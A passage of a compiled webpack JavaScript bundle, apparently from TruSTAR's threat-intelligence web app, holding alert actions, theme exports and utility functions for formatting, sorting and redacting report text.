/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "success", function() { return success; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "warn", function() { return warn; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "info", function() { return info; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "error", function() { return error; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "deleteAlert", function() { return deleteAlert; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0__action_types_js__ = __webpack_require__(493);





var alert = function alert(payload) {
  return {
    type: __WEBPACK_IMPORTED_MODULE_0__action_types_js__["a" /* ADD_ALERT */],
    payload: payload
  };
};

// TODO: Create Alert with action item (such as links)
var success = function success(text) {
  return alert({ type: 'success', text: text });
};

var warn = function warn(text) {
  return alert({ type: 'warning', text: text });
};

var info = function info(text) {
  return alert({ type: 'info', text: text });
};

var error = function error(text) {
  return alert({ type: 'error', text: text });
};

var deleteAlert = function deleteAlert(payload) {
  return {
    type: __WEBPACK_IMPORTED_MODULE_0__action_types_js__["b" /* DELETE_ALERT */],
    payload: payload
  };
};

/***/ }),
/* 77 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "b", function() { return DefaultTheme; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "a", function() { return DarkTheme; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "d", function() { return LegacyDefaultTheme; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "c", function() { return LegacyDarkTheme; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0__default_index__ = __webpack_require__(162);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1__dark_index__ = __webpack_require__(1477);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2__splunk_default_index__ = __webpack_require__(3494);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3__splunk_dark__ = __webpack_require__(3497);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_4__common_index__ = __webpack_require__(212);
var _extends = Object.assign || function (target) { for (var i = 1; i < arguments.length; i++) { var source = arguments[i]; for (var key in source) { if (Object.prototype.hasOwnProperty.call(source, key)) { target[key] = source[key]; } } } return target; };

// TruSTAR Themes



// Splunk Themes





// Shared Globals


var DefaultTheme = _extends({}, __WEBPACK_IMPORTED_MODULE_2__splunk_default_index__, __WEBPACK_IMPORTED_MODULE_4__common_index__);

var DarkTheme = _extends({}, __WEBPACK_IMPORTED_MODULE_3__splunk_dark__, __WEBPACK_IMPORTED_MODULE_4__common_index__);

var LegacyDefaultTheme = _extends({}, __WEBPACK_IMPORTED_MODULE_0__default_index__, __WEBPACK_IMPORTED_MODULE_4__common_index__);
var LegacyDarkTheme = _extends({}, __WEBPACK_IMPORTED_MODULE_1__dark_index__, __WEBPACK_IMPORTED_MODULE_4__common_index__);

/***/ }),
/* 78 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
Object.defineProperty(__webpack_exports__, "__esModule", { value: true });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "isReport", function() { return isReport; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "formatArrayValues", function() { return formatArrayValues; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "getHostname", function() { return getHostname; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "pluck", function() { return pluck; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "pick", function() { return pick; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "diff", function() { return diff; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "getWindowDimensions", function() { return getWindowDimensions; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "redirectTo", function() { return redirectTo; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "pluralize", function() { return pluralize; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "truncateText", function() { return truncateText; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "bytesToKb", function() { return bytesToKb; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "bytesToMb", function() { return bytesToMb; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "kbToBytes", function() { return kbToBytes; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "mbToBytes", function() { return mbToBytes; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "formatFilesize", function() { return formatFilesize; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "readFile", function() { return readFile; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "formatRelativeTime", function() { return formatRelativeTime; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "toCaps", function() { return toCaps; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "shasum", function() { return shasum; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "matchReplace", function() { return matchReplace; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "redactableDict", function() { return redactableDict; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "redactedDict", function() { return redactedDict; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "parseRedactables", function() { return parseRedactables; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "parseRedacted", function() { return parseRedacted; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "redactAll", function() { return redactAll; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "oneOf", function() { return oneOf; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "exclude", function() { return exclude; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "sortBy", function() { return sortBy; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "applySearchAndSortOptions", function() { return applySearchAndSortOptions; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "sortByEnclaveId", function() { return sortByEnclaveId; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "trimDateTime", function() { return trimDateTime; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "toJS", function() { return toJS; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "isImmutable", function() { return isImmutable; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "validatePasswords", function() { return validatePasswords; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "validatePassword", function() { return validatePassword; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "getFunctionNamesInObject", function() { return getFunctionNamesInObject; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "resolveAPI", function() { return resolveAPI; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_moment_timezone__ = __webpack_require__(214);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_moment_timezone___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_0_moment_timezone__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_crypto__ = __webpack_require__(1232);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_crypto___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_1_crypto__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2_immutable__ = __webpack_require__(1);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3_ramda_src_isEmpty__ = __webpack_require__(1133);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3_ramda_src_isEmpty___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_3_ramda_src_isEmpty__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_4_ramda_src_prop__ = __webpack_require__(323);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_4_ramda_src_prop___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_4_ramda_src_prop__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_5_ramda_src_forEach__ = __webpack_require__(1127);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_5_ramda_src_forEach___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_5_ramda_src_forEach__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_6_ramda__ = __webpack_require__(8);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_6_ramda___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_6_ramda__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_7_lodash_isstring__ = __webpack_require__(81);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_7_lodash_isstring___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_7_lodash_isstring__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_8_lodash_escaperegexp__ = __webpack_require__(123);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_8_lodash_escaperegexp___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_8_lodash_escaperegexp__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_9_debug__ = __webpack_require__(7);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_9_debug___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_9_debug__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_10_trustar_utils__ = __webpack_require__(5);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_11_trustar_fp__ = __webpack_require__(109);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_12_url__ = __webpack_require__(1268);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_12_url___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_12_url__);
var _slicedToArray = function () { function sliceIterator(arr, i) { var _arr = []; var _n = true; var _d = false; var _e = undefined; try { for (var _i = arr[Symbol.iterator](), _s; !(_n = (_s = _i.next()).done); _n = true) { _arr.push(_s.value); if (i && _arr.length === i) break; } } catch (err) { _d = true; _e = err; } finally { try { if (!_n && _i["return"]) _i["return"](); } finally { if (_d) throw _e; } } return _arr; } return function (arr, i) { if (Array.isArray(arr)) { return arr; } else if (Symbol.iterator in Object(arr)) { return sliceIterator(arr, i); } else { throw new TypeError("Invalid attempt to destructure non-iterable instance"); } }; }();

var _typeof = typeof Symbol === "function" && typeof Symbol.iterator === "symbol" ? function (obj) { return typeof obj; } : function (obj) { return obj && typeof Symbol === "function" && obj.constructor === Symbol && obj !== Symbol.prototype ? "symbol" : typeof obj; };
















var debug = __WEBPACK_IMPORTED_MODULE_9_debug___default()('app:lib:utils');

var isReport = function isReport(map) {
  if (!map && (typeof map === 'undefined' ? 'undefined' : _typeof(map)) !== 'object') return false;
  return map.has && map.has('title');
};

var formatArrayValues = function formatArrayValues() {
  var valueArray = arguments.length > 0 && arguments[0] !== undefined ? arguments[0] : [];

  var arrayString = valueArray.toString();
  return arrayString.replace(/\,/g, ', '); /* Todd,James -> Todd, James */
};

var getHostname = function getHostname(x) {
  return __WEBPACK_IMPORTED_MODULE_11_trustar_fp__["IO"].of(x).map(__WEBPACK_IMPORTED_MODULE_12_url__["parse"]).map(__WEBPACK_IMPORTED_MODULE_4_ramda_src_prop___default()('hostname')).foldOr(function (err) {
    console.warn('Cannot parse malformed or undefined URL: ', x);
    return null;
  });
};

/**
 * Returns a plucker function that will pluck the property at a given keypath
 * from an immutable iterable.
 */
var pluck = function pluck(keyPath, notSetValue) {
  return function (x) {
    if (typeof keyPath === 'string') keyPath = [keyPath];
    return x.getIn(keyPath, notSetValue);
  };
};

var pick = function pick() {
  for (var _len = arguments.length, properties = Array(_len), _key = 0; _key < _len; _key++) {
    properties[_key] = arguments[_key];
  }

  return function (x) {
    return properties.reduce(function (map, prop) {
      if (typeof prop === 'string') prop = [prop];

      // Do not assign any props that aren't in the source
      if (!x.hasIn(prop)) return map;

      return map.set(prop, x.getIn(prop));
    }, Object(__WEBPACK_IMPORTED_MODULE_2_immutable__["Map"])());
  };
};

/**
 * Calculate a diff between two objects. Only calculates shallow diffs.
 * Sometimes useful for debugging prop or state updates.
 *
 * Example:
 *  const propDiff = diff(prevProps, this.props);
 *  if (propDiff) console.log(propDiff);
 */
var diff = function diff(a, b) {
  var results = {};
  __WEBPACK_IMPORTED_MODULE_5_ramda_src_forEach___default()(function (k) {
    if (a[k] !== b[k]) {
      results[k] = {
        prev: a[k],
        current: b[k]
      };
    }
  })(Object.keys(a));

  return __WEBPACK_IMPORTED_MODULE_3_ramda_src_isEmpty___default()(results) ? null : results;
};

var getWindowDimensions = function getWindowDimensions() {
  var result = { width: 0, height: 0 };

  // NOTE: This is all in a try catch so we ignore flow errors
  try {
    var _width = window.innerWidth
    // $FlowIgnore
    || document.documentElement.clientWidth
    // $FlowIgnore
    || document.body.clientWidth;

    var _height = window.innerHeight
    // $FlowIgnore
    || document.documentElement.clientHeight
    // $FlowIgnore
    || document.body.clientHeight;

    result = { width: _width, height: _height };
  } catch (err) {
    /* Hopefully this never happens */
    debug('Could not get window dimensions.', err);
  }

  return result;
};

/**
 * Redirect to a new URL, however, if in dev mode just warn and do nothing else.
 * This is useful for pages that auto redirect. We sometimes need to debug them
 * and it's a real annoyance to have to create a new user or get the app into
 * some difficult to access state.
 */
var redirectTo = function redirectTo(url, isDev) {
  if (isDev) {
    debug('redirectTo(\'' + url + '\') called but dev mode enabled. Not redirecting');
    return;
  }

  window.location.replace(url);
};

/**
 * Pluralize a word.
 * NOTE: This does NOT account for the numerous odd pluralizations in the
 * english language (yet)
 */
var pluralize = function pluralize(word, count) {
  return count === 1 ? word : word + 's';
};

/**
 * Given some text truncate it to within a given length, adding elipses to show
 * that it has been truncated.
 */

var truncateText = function truncateText(_ref) {
  var _ref$text = _ref.text,
      text = _ref$text === undefined ? '' : _ref$text,
      _ref$length = _ref.length,
      length = _ref$length === undefined ? 24 : _ref$length;

  if (!__WEBPACK_IMPORTED_MODULE_7_lodash_isstring___default()(text)) {
    debug('truncateText passed non-text value of ' + text);
    return '';
  }
  if (text.length <= length) return text;
  return text.slice(0, length - 3) + '...';
};

/**
 * Convert bytes to KB
 */
var bytesToKb = function bytesToKb(bytes) {
  return bytes / 1024;
};

/**
 * Convert bytes to MB
 */
var bytesToMb = function bytesToMb(bytes) {
  return bytesToKb(bytes) / 1024;
};

var kbToBytes = function kbToBytes(kb) {
  return kb * 1024;
};

var mbToBytes = function mbToBytes(mb) {
  return kbToBytes(mb) * 1024;
};

var formatFilesize = function formatFilesize(bytes) {
  var kb = bytesToKb(bytes);
  var mb = bytesToMb(bytes);
  return kb < 1000 ? kb.toFixed(2) + ' kb' : mb.toFixed(2) + ' mb';
};

/**
 * Asynchronously read a file. This is simply a wrapper around the FileReader
 * API, which is not great.
 */
var readFile = function readFile(file) {
  return new Promise(function (resolve, reject) {
    var reader = new FileReader();

    if (!(file instanceof Blob)) {
      var err = new Error('file must be an instance of File or Blob.');
      return reject(err);
    }

    reader.onerror = function () {
      return reject.apply(undefined, arguments);
    };
    reader.onabort = function () {
      return reject.apply(undefined, arguments);
    };

    // reader.result should be a string. See the docs:
    // https://developer.mozilla.org/en-US/docs/Web/API/FileReader/readAsText
    // $FlowIssue
    reader.onloadend = function (contents) {
      return resolve(reader.result);
    };

    reader.readAsText(file);
  });
};

/**
 * The formatting portion of this function is pretty arbitrary and not based on
 * anything. It may prove better to simply use a separate function rather than
 * add formatting logic to this one.
 *
 * If format is passed then the '%%' within the format string will be replaced
 * with the relative date.
 *
 * NOTE: we are calling this funciton on a number of types of objects througout
 * the app, not all of which are guaranteed to have a `created` property. As
 * such we short circuit and return 'Unknown', preserving the implied return
 * type of String. This isn't the prettiest solution but without stricter
 * contracts on the server side we can't make many assumptions.
 */

var formatRelativeTime = function formatRelativeTime(created, format) {
  if (Number.isFinite(created)) {
    created = __WEBPACK_IMPORTED_MODULE_0_moment_timezone___default()(created);
  }

  // Short circuit if we aren't passed a moment. See note above for details.
  if (!__WEBPACK_IMPORTED_MODULE_0_moment_timezone___default.a.isMoment(created)) {
    debug('formatRelativeTime should be passed a moment object. It was not. Instantiating new moment...');
    return 'Unknown';
  }

  // Short circuit if a format was passed. Just use moment directly
  if (format) {
    // $FlowIssue: created is definitely an instance of moment here
    return created.utc().format(format);
  }

  var now = __WEBPACK_IMPORTED_MODULE_0_moment_timezone___default()();
  var ms = now.diff(created);
  var d = __WEBPACK_IMPORTED_MODULE_0_moment_timezone___default.a.duration(ms);
  var minutes = Math.floor(d.asMinutes());
  var hours = Math.floor(d.asHours());
  var days = Math.floor(d.asDays());
  var weeks = Math.floor(d.asWeeks());
  var months = Math.floor(d.asMonths());
  var relative = void 0;

  if (minutes < 1) {
    relative = 'just now';
  } else if (minutes < 60) {
    relative = minutes + ' minute' + (minutes !== 1 ? 's' : '') + ' ago';
  } else if (hours < 24) {
    relative = hours + ' hour' + (hours !== 1 ? 's' : '') + ' ago';
  } else if (days < 31) {
    relative = days + ' day' + (days !== 1 ? 's' : '') + ' ago';
  } else if (weeks < 4) {
    relative = weeks + ' week' + (weeks !== 1 ? 's' : '') + ' ago';
  } else if (months < 12) {
    relative = months + ' month' + (months !== 1 ? 's' : '') + ' ago';
  } else {
    // $FlowIssue: created is definitely an instance of moment here
    relative = created.format('YYYY-MM-DD HH:mm:ss');
  }

  return relative;
};

var toCaps = function toCaps(str) {
  return Object(__WEBPACK_IMPORTED_MODULE_10_trustar_utils__["toLower"])(str).split(' ').map(__WEBPACK_IMPORTED_MODULE_10_trustar_utils__["capitalize"]).join(' ');
};

/* **************************************************************************
 * Report Parsing
 * *************************************************************************/

var shasum = function shasum(string) {
  var _shasum = __WEBPACK_IMPORTED_MODULE_1_crypto___default.a.createHash('sha1');
  _shasum.update(string);
  return _shasum.digest('hex');
};

/**
 * Given a string, replace every substring that is matched by the `match` regex
 * with the result of calling `fn` on matched substring. The result will be an
 * array with all odd indexed elements containing the replacements. The primary
 * use case is similar to using String.prototype.replace execpt for React.
 *
 * React will happily render an array as children of a react element, which
 * makes this approach very useful for tasks like surrounding certain text
 * within a string with react elements.
 *
 * Example:
 * matchReplace(
 *   'Emphasize all phone numbers like 884-555-4443.',
 *   /([\d|-]+)/g,
 *   (number, i) => <strong key={i}>{number}</strong>
 * );
 * // => ['Emphasize all phone numbers like ', <strong>884-555-4443</strong>, '.'
 *
 * @param {string} str
 * @param {regexp} match Must contain a matching group
 * @param {function} fn
 * @return {array}
 */

var matchReplace = function matchReplace(str, match, fn) {
  var result = str.split(match);

  // Apply fn to all odd elements
  for (var _i = 1, _length = result.length; _i < _length; _i += 2) {
    result[_i] = fn(result[_i], _i);
  }

  return result;
};

/**
 * A simple dictionary for storing redactable values and accessing them later by
 * their hash. The reason for this is that initially we were running into issues
 * with double redaction because certain certain strings, especially numbers,
 * would be redacted multiple times.
 *
 * For example: 'ip 8.8.8.8' was initially transformed to 'ip {catID::8.8.8.8}'
 * but then at some later time some other redactable would have text that also
 * matched 8.8.8.8 or perhaps a subset. In the end we would end up with nested
 * redactable string entities which just doens't work:
 * 'ip {catID::8.8.{catID::8.8}}'
 * By hashing the redactable text string we can replace it with a unique hash
 * that won't be matched by subsequent redactables:
 * 'ip {catID::8.8.8.8}' -> 'ip {catID::c4c36a91b52b495ff25b50a041908b2fddb8f89e}'
 *
 * NOTE: This is a IIFE that returns an object. i.e. redactableDict is an
 * object, not a function.
 *
 * TODO: THis should be moved into state. Also since there are both get and set
 * methods exposed
 */
var redactableDict = function () {
  var dict = {};

  return {
    get: function get(k) {
      return dict[k];
    },
    set: function set(k, v) {
      return dict[k] = v;
    },
    clear: function clear() {
      dict = {};
    }
  };
}(); // IIFE

var redactedDict = function () {
  var dict = {};

  return {
    get: function get(k) {
      return dict[k];
    },
    set: function set(k, v) {
      return dict[k] = v;
    },
    clear: function clear() {
      dict = {};
    }
  };
}(); // IIFE

/**
 * Wrap all redactable text strings in an easily matchable custom string format
 * that contains the type of redactable as well as the text value. By
 * pre-parsing the string this way we make it very simple to match all these
 * string entities with a regex and perform react string -> array replacement
 * for rendering.
 *
 * The reasoning is that this makes matchReplace work quite well. If we wanted
 * to skip directly to match replace we would likely end up creating many nested
 * arrays. By iterating through the redactables this way and building a parsed
 * entity string we are able to pass the resulting string directly to
 * matchReplace, rather than calling matchReplace on a number of strings within
 * an array, potentially producing even deeper nested arrays.
 *
 * IMPORTANT NOTE: We do not use case-insensitive regex because currently the
 * server will return things like 'password' and 'Password' separately.
 * NOTE: If we can figure out a way to never match strings within brackets then
 * this will not be necessary.
 *
 * Example:
 * ('hey 8.8.8.8', [{ categoryId: 5, text: '8.8.8.8' }]) -> 'hey {5::8.8.8.8}'
 */
var parseRedactables = function parseRedactables(str, redactables) {
  var result = str;

  redactables.forEach(function (x) {
    var categoryId = x.get('categoryId');
    var text = x.get('text');
    var hash = shasum(text);

    redactableDict.set(hash, text); // Store the real value for later

    var re = new RegExp(__WEBPACK_IMPORTED_MODULE_8_lodash_escaperegexp___default()(text), 'g'); // See important note above
    result = result.replace(re, '{-{' + categoryId + '::' + hash + '}-}');
  });

  return result;
};

/**
 * NOTE: ESLint flagged this escaping as uesless but I'm not sure it actually
 * is.
 */
var reFromPattern = function reFromPattern(pattern) {
  return __WEBPACK_IMPORTED_MODULE_8_lodash_escaperegexp___default()(pattern).replace(/(\\\*)/gi, '\(\\S\*\)'); // eslint-disable-line no-useless-escape
};

/**
* Wrap all REDACTED text strings in an easily matchable custom string format
* that contains the type of redactable as well as the text value.
*
* NOTE: The toHash paramter is a boolean that if true, will replace all
* occurrences of the redacted terms with a hash in the form
* {-categoryName::text::hash-}, so that these terms can be rendered specially
* in the UI. When toHash is false, the redacted terms are replaced with the
* category they belong in, in the form <categoryName>, so that these terms
* will be replaced in the report when saved or submitted.
* @param {string} str
* @param {Immutable.List<Immutable.Map>} redactables
* @param {bool} toHash
* @return {string}
*/
var parseRedacted = function parseRedacted(str, redactionMap, toHash) {
  if (!__WEBPACK_IMPORTED_MODULE_7_lodash_isstring___default()(str)) return str;

  var result = str;

  var _redactionMap$reduce = redactionMap.reduce(function (agg, x) {
    var type = x.get('type');

    if (type === 'TEXT' || type === 'REGEX') {
      agg[0].push(x); // Redactable
    } else {
      agg[1].push(x); // Rejected
    }

    return agg;
  }, [[], []]),
      _redactionMap$reduce2 = _slicedToArray(_redactionMap$reduce, 2),
      redactables = _redactionMap$reduce2[0],
      rejectedRedactables = _redactionMap$reduce2[1];

  rejectedRedactables.forEach(function (x) {
    var type = 'unknown';
    var text = 'unknown';

    if (x && typeof x.toJS === 'function') {
      type = x.get('type');
      text = x.get('text');
    }

    debug('WARNING: Unparsable redaction term found: { type: ' + type + ', text: ' + text + ' }');
  });

  redactables.forEach(function (x) {
    var categoryId = x.get('categoryId');
    var categoryName = x.get('categoryName');
    var text = x.get('text');
    var type = x.get('type', '').toUpperCase();
    var hash = shasum(text);

    redactedDict.set(hash, text); // Store the real value for later

    var regex = void 0;

    if (type === 'TEXT') {
      var regString = reFromPattern(text);

      var first = text.length > 0 ? text.charAt(0) : text;
      var last = text.length > 0 ? text.charAt(text.length - 1) : text;
      var punctuation = new RegExp(/[^\w\s]/);

      if (first.match(punctuation) && last.match(punctuation)) {
        // ?text?
        regex = new RegExp(regString, 'gi');
      } else if (first.match(punctuation)) {
        // ?text
        regex = new RegExp('(' + regString + ')(\\b|(?=\\_))', 'gi');
      } else if (last.match(punctuation)) {
        // text?
        regex = new RegExp('(\\b|(?:\\_))(' + regString + ')', 'gi');
      } else {
        // text OR te?xt
        regex = new RegExp('(\\b|(?:\\_))(' + regString + ')(\\b|(?=\\_))', 'gi');
      }
    } else if (type === 'REGEX') {
      var _regString = reFromPattern(text);
      regex = new RegExp('(\\b|(?:\\_))' + _regString + '(\\b|(?=\\_))', 'gi');
      // This is disgustingly hacky code just to get the IP addresses that are
      // redacted to be valid. The necessity for this edge case handling comes
      // from our lack of support for CIDR blocks in wildcard redaction -- this
      // leads users to input terms such as 10.* but our usual regex is not
      // sufficent in accurately capturing the valid IP, not just substrings.
      if (categoryName === 'ip-address') {
        var matches = result.match(regex);
        if (matches) {
          var validMatches = matches.filter(function (mat) {
            return (/([0-9]{1,3}\.){3}[0-9]{1,3}/.test(mat)
            );
          }).map(function (mat) {
            return __WEBPACK_IMPORTED_MODULE_8_lodash_escaperegexp___default()(mat);
          });
          if (validMatches.length > 0) {
            var validRegex = new RegExp(validMatches.join('|'), 'gi');
            result = toHash ? result.replace(validRegex, '{--{' + categoryId + '::' + hash + '}--}') : result.replace(validRegex, '<' + categoryName + '>');
            return result;
          }
        }
        return result;
      }
    }

    if (regex) {
      result = toHash ? result.replace(regex, '{--{' + categoryId + '::' + hash + '}--}') : result.replace(regex, '<' + categoryName + '>');
    }

    return result;
  });

  return result;
};

/**
 * Anonymize all report text. In reality we are explicit about what we redact,
 * for now this includes:
 *
 * - report.title
 * - report.content.data (NOTE: We don't redact filename)
 *
 * @param {Immutable.Map} report
 * @param {Immutable.Map} redactionMap
 * @param {bool} toHash (This will be true only when saving/submitting reports)
 *
 * @return {Immutable.Map} anonymizedReport
 */

var redactAll = function redactAll(_ref2) {
  var report = _ref2.report,
      redactionMap = _ref2.redactionMap,
      toHash = _ref2.toHash;

  // Short circuit if there is nothing to redact.
  if (!redactionMap.size) return report;

  return report.map(function (val, key) {
    switch (key) {
      case 'title':
        return parseRedacted(val, redactionMap, toHash);
      case 'content':
        return val.set('data', parseRedacted(val.get('data'), redactionMap, toHash));
      default:
        return val;
    }
  });
};

/**
 * Return an inclusion predicate function to test if x is included within the
 * list passed to oneOf
 */
var oneOf = function oneOf() {
  for (var _len2 = arguments.length, args = Array(_len2), _key2 = 0; _key2 < _len2; _key2++) {
    args[_key2] = arguments[_key2];
  }

  return function (x) {
    return args.indexOf(x) > -1;
  };
};

/**
 * Exclude the list of keys from a merge of two objects. Meaning the value at
 * any of the keys passed in will not be merged. The result of the merge will be
 * whatever the value was on the original object.
 *
 * NOTE: Returning undefined will let result in the default behavior.
 *
 * Produces a custom mergeWith customizer for use with lodash:
 * See: https://github.com/lodash/lodash/blob/4.16.1/lodash.js#L13288
 */
var exclude = function exclude() {
  for (var _len3 = arguments.length, keys = Array(_len3), _key3 = 0; _key3 < _len3; _key3++) {
    keys[_key3] = arguments[_key3];
  }

  return function (objValue, srcValue, key) {
    if (keys.includes(key)) return objValue;
  };
};

var _get = function _get(attr, obj) {
  return obj.get ? obj.get(attr) : obj[attr];
};

/**
 * Create a sorting function for immutable iterables.
 */
var sortBy = function sortBy(key, order) {
  return function (a, b) {
    var sortVal = 0;
    var compareA = _get(key, a);
    var compareB = _get(key, b);

    if (!compareA && !compareB) {
      sortVal = 0;
    } else if (!compareA) {
      sortVal = 1;
    } else if (!compareB) {
      sortVal = -1;
    } else {
      // Make sure to convert to lowercase if we're dealing with strings. We
      // do not want a case-sensitive comparator
      if (__WEBPACK_IMPORTED_MODULE_7_lodash_isstring___default()(compareA)) compareA = Object(__WEBPACK_IMPORTED_MODULE_10_trustar_utils__["toLower"])(compareA);
      if (__WEBPACK_IMPORTED_MODULE_7_lodash_isstring___default()(compareB)) compareB = Object(__WEBPACK_IMPORTED_MODULE_10_trustar_utils__["toLower"])(compareB);

      // The comparator
      sortVal = compareA < compareB ? 1 : -1;
    }

    if (order === 'DESC') sortVal = sortVal * -1;

    return sortVal;
  };
};

/* NOTE: Similar to above but accepts any iterable entity and an options object and
 * applies sorting and filtering based on the options to the iterable. Options
 * include a search query, a soryBy field key (e.g. name, text, etc.), and
 * an order: ASC | DESC. This method is used for some of our table components,
 * e.g. Enclaves, Malware Terms, etc.
 *
 * TODO: There are still very similar methods in User, Companies getters... it would
 * be nice to refactor them all to use this one common method. There is some logic
 * specific to those modules which is why I didn't refactor them already with this.
 */
var OptionsType = Object(__WEBPACK_IMPORTED_MODULE_2_immutable__["Record"])({ // TODO: I just want this as a type...
  query: '',
  sortBy: 'name',
  sortOrder: 'DESC'
});

var applySearchAndSortOptions = function applySearchAndSortOptions(entities, options) {
  var query = options.get('query');
  return entities.filter(function (entity) {
    var regex = new RegExp(__WEBPACK_IMPORTED_MODULE_8_lodash_escaperegexp___default()(query), 'i');

    // Test all top-level string values
    return entity.valueSeq().filter(__WEBPACK_IMPORTED_MODULE_7_lodash_isstring___default.a).some(function (x) {
      return x.search(regex) > -1;
    });
  }).sort(function (a, b) {
    var sortBy = options.get('sortBy');
    var sortVal = 0;
    var compareA = a.get(sortBy);
    var compareB = b.get(sortBy);

    if (!compareA && !compareB) {
      sortVal = 0;
    } else if (!compareA) {
      sortVal = 1;
    } else if (!compareB) {
      sortVal = -1;
    } else {
      // Make sure to convert to lowercase if we're dealing with strings. We
      // do not want a case-sensitive comparator
      if (__WEBPACK_IMPORTED_MODULE_7_lodash_isstring___default()(compareA)) compareA = compareA.toLowerCase();
      if (__WEBPACK_IMPORTED_MODULE_7_lodash_isstring___default()(compareB)) compareB = compareB.toLowerCase();

      // The comparator
      sortVal = compareA < compareB ? 1 : -1;
    }

    if (options.get('sortOrder') === 'DESC') sortVal = sortVal * -1;

    return sortVal;
  }).toList();
};

/* Custom sort to group list of items (e.g. tags) with an enclaveId by enclave. */

var sortByEnclaveId = function sortByEnclaveId(a, b) {
  return a.get('enclaveId').localeCompare(b.get('enclaveId'));
};

/**
 * Return a new date with any time of day information stripped away. Useful if
 * we want to reduce the accuracy of dates. We had considered using this in
 * timeline filtering to only filter by day and not actual timestamp.
 */
var trimDateTime = function trimDateTime(d) {
  return new Date(d.getFullYear(), d.getMonth(), d.getDay());
};

/**
 * A safe toJS function. Call it on anything!
 */
var toJS = function toJS(x) {
